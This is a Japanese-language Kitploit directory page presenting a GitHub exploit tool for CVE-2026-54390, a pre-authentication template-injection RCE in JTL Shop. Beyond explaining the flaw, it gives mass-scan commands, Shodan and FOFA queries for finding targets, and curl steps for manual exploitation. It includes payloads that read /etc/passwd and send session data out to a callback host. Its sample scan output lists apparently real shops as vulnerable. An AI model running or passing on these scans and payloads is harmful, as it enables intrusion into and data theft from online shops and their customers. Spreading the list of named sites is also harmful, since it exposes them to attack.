Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-54390 — CVE-2026-54390 — JTL Shop Smarty SSTI RCE | fetch('string:' . ) による事前認証テンプレートインジェクション | 5.2.0-5.7.1 | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-54390
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubshinthink/cve-2026-54390

CVE-2026-54390

CVE-2026-54390 — JTL Shop Smarty SSTI RCE | fetch('string:' . ) による事前認証テンプレートインジェクション | 5.2.0-5.7.1

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-54390 — JTL Shop Smarty SSTI 一括エクスプロイト

認証前のお問い合わせフォーム → メール件名 → fetch('string:') → RCE


概要

CVE-2026-54390 は、JTL Shop 5.2.0–5.7.1 における緊急 (CVSS 9.8) レベルの認証不要のサーバーサイドテンプレートインジェクション (SSTI) です。

SmartyRenderer::renderTemplate() メソッドは、メールの件名行を $smarty->fetch('string:' . $subject) に渡し、Smarty テンプレートとしてレンダリングします。ユーザーがお問い合わせフォームに入力したフィールドは、parseSubject() 内の #var# 解決を介してメール件名に到達し、fetch() によって再評価されます。

Text::filterXSS() は HTML タグを除去するだけで、{ と } は通過します。登録されている Smarty モディファイアには、file_get_contents と unserialize が含まれます。

影響を受けるバージョン

JTL Shopステータス
< 5.2.0影響なし
5.2.0 – 5.3.x脆弱 (認証情報の窃取)
5.4.0 – 5.7.1脆弱 (完全な RCE)
5.5.4 / 5.6.2 / 5.7.2+修正済み

脆弱性の仕組み

根本原因

root@kitploit:~
// includes/src/Mail/Renderer/SmartyRenderer.php line 63
$subject = $this->parseSubject($model->getSubject($languageID));
$template->setSubject($this->getSmarty()->fetch('string:' . $subject));
//                       ^^^^^^^^^^^^^^^^^^^^^
//                     Email subject rendered as Smarty template

攻撃の流れ

root@kitploit:~
1. User fills contact form → name/email/message → filterXSS()
2. filterXSS only strips HTML — {system()} passes through
3. Email subject template: "Neue Anfrage von #Kunde.vorname#"
4. parseSubject() resolves #Kunde.vorname# → {system('id')}
5. fetch('string:Neue Anfrage von {system(\'id\')}') → EXECUTES
6. Email sent with subject: "Neue Anfrage von uid=33(www-data)..."

登録済み Smarty モディファイア

root@kitploit:~
// PluginCollection.php — available for RCE
'unserialize', 'file_get_contents', 'file_exists', 'class_exists'

インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-54390.git
cd CVE-2026-54390
pip install -r requirements.txt

使用方法

root@kitploit:~
# Single target
python cve_2026_54390.py -t target.com

# Mass scan
python cve_2026_54390.py -f jtl-targets.txt -o vuln.txt

# SSTI probe via contact form
python cve_2026_54390.py -t target.com --exploit --debug

引数

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save vulnerable targets
  --threads         Workers (default: 20)
  --exploit         Submit SSTI probe via contact form
  --debug           Show every HTTP request
  -v, --verbose     Detailed output

概念実証 (PoC)

検出

root@kitploit:~
$ python cve_2026_54390.py -t jtl-shop.de --debug
root@kitploit:~
  JTL Shop Smarty SSTI | CVE-2026-54390

  [jtl-shop.de] JTL Shop v5.7.0
  [jtl-shop.de] [+] JTL Shop v5.7.0
  [jtl-shop.de] contact form: /Kontakt | subjects:5

  Host       : jtl-shop.de
  JTL Shop   : YES v5.7.0
  Contact    : YES
  Form path  : /Kontakt
  Subjects   : 5 available

大規模スキャン

root@kitploit:~
  [!] business.trustedshops.ch   1.6s  v5.5.2  form:/Kontakt
  [!] bmg-moebel.de              5.3s  v5.7.0  form:/Kontakt
  [100/5600] 1%  |  JTL:23  Vuln:12

手動での悪用

ステップ 1 — お問い合わせフォームとトークンの取得

root@kitploit:~
curl -sk 'https://target.com/Kontakt' | grep -oP 'name="jtl_token"[^>]*value="\K[^"]+'

ステップ 2 — SSTI プローブの送信

root@kitploit:~
curl -sk -X POST 'https://target.com/Kontakt' \
  -d 'kontakt=1' -d 'subject=1' \
  -d 'nachricht={7*7}' \
  -d 'vorname={7*7}' \
  -d 'nachname={7*7}' \
  -d '[email protected]'

ステップ 3 — ファイルの読み取り

root@kitploit:~
{{"/etc/passwd"|file_get_contents}}

ステップ 4 — OOB 外部送信

root@kitploit:~
{{"http://callback.com/?s="|file_get_contents|cat:$smarty.session|replace_delim:":"}}

FOFA / Shodan

root@kitploit:~
FOFA:   body="jtl" && body="kontakt"
Shodan: http.html:"jtl" http.html:"Kontakt"

免責事項

教育目的および許可を得たテスト目的のみに使用してください。 作者は不正使用について一切の責任を負いません。


参考情報

リソース

JTL-Software および Sansec とは提携関係にありません。

ツールをダウンロード
リンク
Sansec Researchsansec.io/research/jtl-shop-ssti-rce
IONIX Advisoryionix.io/threat-center/cve-2026-54390
JTL Forumforum.jtl-software.de
NVDCVE-2026-54390